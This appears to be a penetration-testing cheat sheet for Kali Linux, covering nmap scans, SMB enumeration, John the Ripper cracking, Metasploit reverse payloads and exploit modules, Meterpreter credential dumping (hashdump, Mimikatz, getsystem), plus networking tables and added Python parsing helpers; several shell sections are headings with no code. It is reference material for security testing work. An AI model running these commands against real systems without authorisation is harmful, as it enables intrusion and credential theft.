Kali Linux Cheat Sheet for Penetration Testers by rock star devil
Penetration testing (also called pen testing) is the practice of
testing a computer system, network or Web application to find
vulnerabilities that an attacker could exploit.
This Kali Linux cheat sheet for penetration testers is a high-level overview of a typical penetration testing toolkit, covering nmap, sqlmap, IPv4 addressing, enumeration, fingerprinting and more. Always check the man pages if you are in doubt or a command does not work as shown here (syntax can differ by OS and by version) for the operating system you are using (BlackBox, Black Ubuntu, ParrotSec OS, Debian, Ubuntu etc.). I’ve also referenced some guides that I found useful in different sections, and they might come in handy.
Recon and Enumeration
NMAP Commands
Nmap (“Network Mapper”) is a free and open source utility for network
discovery and security auditing. Many systems and network
administrators also find it useful for tasks such as network inventory,
managing service upgrade schedules, and monitoring host or service
uptime. Nmap uses raw IP packets in novel ways to determine what hosts
are available on the network, what services (application name and
version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in
use, and dozens of other characteristics. It was designed to rapidly
scan large networks, but works fine against single hosts. Nmap runs on
all major computer operating systems, and official binary packages are
available for Linux, Windows, and Mac OS X.
nmap -v -sS -A -T4 target
    Nmap verbose scan: SYN stealth scan, T4 timing (should be OK on a LAN), OS and service version detection, traceroute and default scripts against discovered services
nmap -v -sS -p- -A -T4 target
    As above but scans all 65535 TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target
    As above but scans all TCP ports and adds a UDP scan (takes even longer)
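What the table does not show is reading the results back out. The following is an added example, not part of the original sheet, that parses nmap's grepable output (the -oG format) into a per-host port list so the scans above can be filtered by host or port; the scan text is a constructed sample and the addresses and host names are made up.

```python
# Added example: parse nmap grepable output (-oG) into per-host port lists.
# SAMPLE_GNMAP is a constructed sample, not a real scan; hosts are made up.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -v -sS -A -T4 -oG - 192.168.1.0/24
Host: 192.168.1.10 (fileserver.lan)\tStatus: Up
Host: 192.168.1.10 (fileserver.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 139/open/tcp//netbios-ssn//Samba smbd 4/, 445/open/tcp//microsoft-ds//Samba smbd 4/\tIgnored State: closed (997)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 80/open/tcp//http//Apache httpd 2.4/, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (998)
# Nmap done -- 256 IP addresses (2 hosts up) scanned
"""


def parse_gnmap(text):
    """Return {ip: [(port, proto, state, service, version), ...]}.

    Each -oG host line is tab-separated "Key: value" fields; the Ports field
    holds comma-separated entries of the form
    port/state/proto/owner/service/rpc/version/. Lines without a Ports field
    (status-only lines, comments) are skipped.
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue
        ip = fields["Host"].split()[0]
        for entry in fields["Ports"].split(", "):
            port, state, proto, _owner, service, _rpc, version = entry.split("/")[:7]
            results.setdefault(ip, []).append((int(port), proto, state, service, version))
    return results


def open_ports(results, ip):
    """Sorted open port numbers for one host (filtered/closed excluded)."""
    return sorted(p for p, _proto, state, _svc, _ver in results.get(ip, []) if state == "open")


def hosts_exposing(results, port):
    """Hosts with the given port open, e.g. 445 before the SMB enumeration below."""
    return sorted(ip for ip, ports in results.items()
                  if any(p == port and s == "open" for p, _pr, s, _sv, _v in ports))
```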
In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network.
Other Host Discovery
Other methods of host discovery that don’t use nmap.
netdiscover -r 192.168.1.0/24
    Discovers IP, MAC address and MAC vendor on the subnet via ARP; helpful for confirming you’re on the right VLAN at $client site
SMB Enumeration
Enumerate Windows shares / Samba shares.
nbtscan 192.168.1.0/24
    Discover Windows / Samba servers on the subnet: finds Windows MAC addresses, NetBIOS names and the client workgroup / domain
enum4linux -a target-ip
    Do everything: runs all options (find Windows client domain / workgroup) apart from dictionary-based share name guessing
Python Local Web Server
Python local web server command, handy for serving up shells and exploits from an attacking machine.
python -m SimpleHTTPServer 80
    Run a basic HTTP server, great for serving up shells etc. (Python 2 module; on Python 3 the equivalent is python3 -m http.server 80)
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
mount 192.168.1.1:/vol/share /mnt/nfs
    Mount NFS share at /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
    Mount a Windows CIFS / SMB share on Linux at /mnt/cifs; if you omit password= it will prompt on the CLI (more secure, as the password won’t end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
    Mount a Windows share on Windows from the command line
apt-get install smb4k -y
    Install smb4k on Kali, a useful Linux GUI for browsing SMB shares
Basic Fingerprinting
A device fingerprint, machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
    Basic versioning / fingerprinting via the displayed banner
SNMP Enumeration
SNMP enumeration is the process of using SNMP to enumerate user
accounts on a target system. SNMP employs two major types of software
components for communication: the SNMP agent, which is located on the
networking device, and the SNMP management station, which communicates
with the agent.
Hydra is a parallelized login cracker which supports numerous protocols. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager. On Kali Linux it is pre-installed.
Use -t to limit concurrent connections, for example: -t 15
Cracking passwords using Hydra: guide here
Password Cracking
John The Ripper – JTR
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations against a service daemon such as an FTP or telnet server. John, however, needs the hash first, so the greater challenge for an attacker is to first obtain the hash that is to be cracked. Nowadays hashes are more easily crackable using free rainbow tables available online: go to one of the sites, submit the hash, and if the hash is of a common word the site will show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database; the larger the database, the more words are covered.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
    JTR password cracking
john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
    JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show
    JTR forced descrypt brute force cracking
Cracking passwords using John the Ripper: guide here
Exploit Research
Ways to find exploits for enumerated hosts / services.
searchsploit windows 2003 | grep -i local
    Search exploit-db for exploits; in this example Windows 2003 + local escalation
SUID C binary files are often required to spawn a shell as a superuser; you can update the UID / GID and shell as required.
Below are some quick copy-and-paste examples for various shells:
SUID C Shell for /bin/bash
SUID C Shell for /bin/sh
Building the SUID Shell binary
For 32 bit:
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.
Python TTY Shell Trick
Spawn Interactive sh shell
Spawn Perl TTY Shell
Spawn Ruby TTY Shell
Spawn Lua TTY Shell
Spawn TTY Shell from Vi
Run shell commands from vi:
Spawn TTY Shell NMAP
Metasploit
Metasploit was created by H. D. Moore in 2003 as a portable network
tool using Perl. By 2007, the Metasploit Framework had been completely
rewritten in Ruby. On October 21, 2009, the Metasploit Project announced
that it had been acquired by Rapid7, a security company that provides
unified vulnerability management solutions.
Like comparable commercial products such as Immunity’s Canvas or Core
Security Technologies’ Core Impact, Metasploit can be used to test the
vulnerability of computer systems or to break into remote systems. Like
many information security tools, Metasploit can be used for both
legitimate and unauthorized activities. Since the acquisition of the
Metasploit Framework, Rapid7 has added two open core proprietary
editions called Metasploit Express and Metasploit Pro.
Metasploit’s emerging position as the de facto exploit development
framework led to the release of software vulnerability advisories often
accompanied by a third party Metasploit exploit module that highlights
the exploitability, risk and remediation of that particular bug.
Metasploit 3.0 began to include fuzzing tools, used to discover software
vulnerabilities, rather than just exploits for known bugs. This avenue
can be seen with the integration of the lorcon wireless (802.11) toolset
into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in
August 2011.
Meterpreter Payloads
Windows reverse meterpreter payload
set payload windows/meterpreter/reverse_tcp
    Windows reverse TCP payload
Windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcp
set ViewOnly false
    Meterpreter Windows VNC payload
Linux Reverse Meterpreter payload
set payload linux/meterpreter/reverse_tcp
    Meterpreter Linux reverse payload
Meterpreter Cheat Sheet
Useful meterpreter commands.
upload file c:\\windows
    Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp
    Meterpreter download file from Windows target
execute -f c:\\windows\\temp\\exploit.exe
    Meterpreter run .exe on target; handy for executing uploaded exploits
execute -f cmd -c
    Creates a new channel with a cmd shell
ps
    Meterpreter show processes
shell
    Meterpreter get a shell on the target
getsystem
    Meterpreter attempts privilege escalation on the target
hashdump
    Meterpreter attempts to dump the password hashes on the target
portfwd add -l 3389 -p 3389 -r target
    Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target
    Meterpreter delete port forward
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)
use exploit/windows/smb/ms08_067_netapi
    MS08_067 Windows 2k, XP, 2003 remote exploit
use exploit/windows/dcerpc/ms06_040_netapi
    MS06_040 Windows NT, 2k, XP, 2003 remote exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) remote exploit
Local Windows Metasploit Modules (exploits)
use exploit/windows/local/bypassuac
    Bypass UAC on Windows 7+; set target and arch (x86/x64)
Auxiliary Metasploit Modules
use auxiliary/scanner/http/dir_scanner
    Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan
    Metasploit JBoss vulnerability scanner
use auxiliary/scanner/mssql/mssql_login
    Metasploit MSSQL credential scanner
use auxiliary/scanner/mysql/mysql_version
    Metasploit MySQL version scanner
use auxiliary/scanner/oracle/oracle_login
    Metasploit Oracle login module
Metasploit PowerShell Modules
use exploit/multi/script/web_delivery
    Metasploit PowerShell payload delivery module
post/windows/manage/powershell/exec_powershell
    Metasploit upload and run a PowerShell script through a session
use exploit/multi/http/jboss_maindeployer
    Metasploit JBoss deploy
use exploit/windows/mssql/mssql_payload
    Metasploit MSSQL payload
Post Exploit Windows Metasploit Modules
run post/windows/gather/win_privs
    Metasploit show privileges of the current user
use post/windows/gather/credentials/gpp
    Metasploit grab GPP saved passwords
load mimikatz -> wdigest
    Metasploit load Mimikatz (then run wdigest)
run post/windows/gather/local_admin_search_enum
    Identify other machines that the supplied domain user has administrative access to
Networking
TTL Fingerprinting
Operating System      Default TTL
Windows               128
Linux                 64
Solaris               255
Cisco / Network       255
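The table gives initial TTLs, but a reply has already been decremented once per hop. The following added example (not from the original sheet) maps an observed TTL to the nearest listed OS family and estimates the hop count, and parses ping-style output; the ping lines and hosts are constructed.

```python
import re

# Added example: OS-family guess from an observed TTL, using the table above.
# Initial TTL per OS family as listed in the table (defaults; any OS can tune it).
INITIAL_TTLS = {64: "Linux", 128: "Windows", 255: "Solaris / Cisco / network device"}


def guess_os_from_ttl(observed_ttl):
    """Return (os_family, estimated_hops), or (None, None) if out of range.

    Each router hop decrements TTL by one, so the observed value is the
    sender's initial TTL minus the hop count. We pick the smallest initial TTL
    that is still >= the observed value; a Windows host more than 64 hops away
    would be misread as Linux, so treat this as a hint, not proof.
    """
    if not 1 <= observed_ttl <= 255:
        return None, None
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return INITIAL_TTLS[initial], initial - observed_ttl
    return None, None


def guess_from_ping_output(text):
    """Parse 'from <host>: ... ttl=N' lines (ping-style output) into {host: guess}."""
    guesses = {}
    for m in re.finditer(r"from (\S+): .*?ttl=(\d+)", text):
        guesses[m.group(1)] = guess_os_from_ttl(int(m.group(2)))
    return guesses


# Constructed sample ping replies (not real hosts).
SAMPLE_PING = """\
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.41 ms
64 bytes from 192.168.1.20: icmp_seq=1 ttl=126 time=1.3 ms
64 bytes from 10.0.5.1: icmp_seq=1 ttl=250 time=9.8 ms
"""
```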
IPv4
Classful IP Ranges
E.g. Class A, B, C (deprecated)
Class      IP Address Range
Class A    0.0.0.0 - 127.255.255.255
Class B    128.0.0.0 - 191.255.255.255
Class C    192.0.0.0 - 223.255.255.255
Class D    224.0.0.0 - 239.255.255.255
Class E    240.0.0.0 - 255.255.255.255
IPv4 Private Address Ranges
Class                      Range
Class A private range      10.0.0.0 - 10.255.255.255
Class B private range      172.16.0.0 - 172.31.255.255
Class C private range      192.168.0.0 - 192.168.255.255
Loopback range             127.0.0.0 - 127.255.255.255
IPv4 Subnet Cheat Sheet
CIDR   Decimal Mask       Number of Hosts
/31    255.255.255.254    1 Host
/30    255.255.255.252    2 Hosts
/29    255.255.255.248    6 Hosts
/28    255.255.255.240    14 Hosts
/27    255.255.255.224    30 Hosts
/26    255.255.255.192    62 Hosts
/25    255.255.255.128    126 Hosts
/24    255.255.255.0      254 Hosts
/23    255.255.254.0      510 Hosts
/22    255.255.252.0      1022 Hosts
/21    255.255.248.0      2046 Hosts
/20    255.255.240.0      4094 Hosts
/19    255.255.224.0      8190 Hosts
/18    255.255.192.0      16382 Hosts
/17    255.255.128.0      32766 Hosts
/16    255.255.0.0        65534 Hosts
/15    255.254.0.0        131070 Hosts
/14    255.252.0.0        262142 Hosts
/13    255.248.0.0        524286 Hosts
/12    255.240.0.0        1048574 Hosts
/11    255.224.0.0        2097150 Hosts
/10    255.192.0.0        4194302 Hosts
/9     255.128.0.0        8388606 Hosts
/8     255.0.0.0          16777214 Hosts
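Rather than trusting a typed table, the mask and host count can be derived. The following added example (not from the original sheet) rebuilds the subnet table rows with Python's ipaddress module and classifies an address by classful letter and private / loopback scope per the two range tables above; it goes beyond the table in treating /31 per RFC 3021 (both addresses usable) and /32 as a single host route.

```python
import ipaddress

# Added example: compute the subnet table rows and classify addresses per the
# classful and private range tables above. ipaddress does the arithmetic.
PRIVATE_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOOPBACK_RANGE = ipaddress.ip_network("127.0.0.0/8")


def subnet_row(prefix):
    """(cidr, dotted mask, usable hosts) for a prefix length 0..32.

    Usable hosts = 2^(32-prefix) - 2 (network and broadcast reserved). /31 is
    treated per RFC 3021 as a point-to-point link with both addresses usable,
    and /32 as a single host route; the cheat sheet lists /31 as 1 host.
    """
    net = ipaddress.ip_network(f"0.0.0.0/{prefix}")
    total = net.num_addresses
    usable = total if prefix >= 31 else total - 2
    return f"/{prefix}", str(net.netmask), usable


def build_subnet_table(smallest=31, largest=8):
    """Rows from /smallest down to /largest, the same order as the table above."""
    return [subnet_row(p) for p in range(smallest, largest - 1, -1)]


def ip_class(addr):
    """Classful letter A..E from the first octet (historical; superseded by CIDR)."""
    first = int(ipaddress.IPv4Address(addr)) >> 24
    for limit, letter in ((128, "A"), (192, "B"), (224, "C"), (240, "D")):
        if first < limit:
            return letter
    return "E"


def address_scope(addr):
    """'loopback', 'private' (RFC 1918) or 'public' for an IPv4 address."""
    a = ipaddress.IPv4Address(addr)
    if a in LOOPBACK_RANGE:
        return "loopback"
    if any(a in net for net in PRIVATE_RANGES):
        return "private"
    return "public"
```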
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
Hex   Character
x00   Null Byte
x08   BS
x09   TAB
x0a   LF
x0d   CR
x1b   ESC
x20   SPC
x21   !
x22   "
x23   #
x24   $
x25   %
x26   &
x27   '
x28   (
x29   )
x2a   *
x2b   +
x2c   ,
x2d   -
x2e   .
x2f   /
x30   0
x31   1
x32   2
x33   3
x34   4
x35   5
x36   6
x37   7
x38   8
x39   9
x3a   :
x3b   ;
x3c   <
x3d   =
x3e   >
x3f   ?
x40   @
x41   A
x42   B
x43   C
x44   D
x45   E
x46   F
x47   G
x48   H
x49   I
x4a   J
x4b   K
x4c   L
x4d   M
x4e   N
x4f   O
x50   P
x51   Q
x52   R
x53   S
x54   T
x55   U
x56   V
x57   W
x58   X
x59   Y
x5a   Z
x5b   [
x5c   \
x5d   ]
x5e   ^
x5f   _
x60   `
x61   a
x62   b
x63   c
x64   d
x65   e
x66   f
x67   g
x68   h
x69   i
x6a   j
x6b   k
x6c   l
x6d   m
x6e   n
x6f   o
x70   p
x71   q
x72   r
x73   s
x74   t
x75   u
x76   v
x77   w
x78   x
x79   y
x7a   z
CISCO IOS Commands
A collection of useful Cisco IOS commands.
enable
    Enter privileged (enable) mode
conf t
    Short for configure terminal
(config)# interface fa0/0
    Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255
    Add IP to fa0/0
(config)# line vty 0 4
    Configure the VTY (telnet/SSH) lines
(config-line)# login
    Require a password on login to the line
(config-line)# password YOUR-PASSWORD
    Set telnet password
# show running-config
    Show running config loaded in memory
# show startup-config
    Show startup config
# show version
    Show Cisco IOS version
# show session
    Display open sessions
# show ip interface
    Show network interfaces
# show interface e0
    Show detailed interface info
# show ip route
    Show routes
# show access-lists
    Show access lists
# dir file systems
    Show available files
# dir all-filesystems
    File information
# dir /all
    Show deleted files
# terminal length 0
    No limit on terminal output (disables paging)
# copy running-config tftp
    Copy running config to a TFTP server
# copy running-config startup-config
    Copy running-config to startup-config (save the running config)
Cryptography
Hash Lengths
Hash       Size
MD5        16 bytes
SHA-1      20 bytes
SHA-256    32 bytes
SHA-512    64 bytes
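The length rule in the table is the first thing hash-identifier style tools check. The following added example (not from the original sheet) applies it to hex digests, computing sample hashes from a constructed string with hashlib rather than reproducing any hash from the page; it also shows why length alone is only a first guess.

```python
import hashlib
import re

# Added example: guess a hash algorithm from digest length, as the table above does.
# Hex digest lengths are twice the byte lengths in the table.
HEX_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}
HASHLIB_NAMES = {"MD5": "md5", "SHA-1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def identify_by_length(digest_hex):
    """Return the table's algorithm name for a hex digest, or None.

    None means non-hex input or a length not in the table. Length alone is
    ambiguous (MD4/NTLM digests are also 32 hex digits, for instance), which
    is why the sheet points to hash-identifier for anything non-obvious.
    """
    s = digest_hex.strip()
    if not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    return HEX_LENGTHS.get(len(s))


def digest_bytes(digest_hex):
    """Size in bytes (the unit the table uses) of a hex digest."""
    return len(digest_hex.strip()) // 2


def sample_hashes(text):
    """Digests of a constructed sample string under each listed algorithm."""
    data = text.encode()
    return {name: hashlib.new(algo, data).hexdigest() for name, algo in HASHLIB_NAMES.items()}
```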
Hash Examples
Likely just use hash-identifier for this, but here are some example hashes:
Identifying hashes and cracking passwords using Wireshark: guide here
SQLMap Examples
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.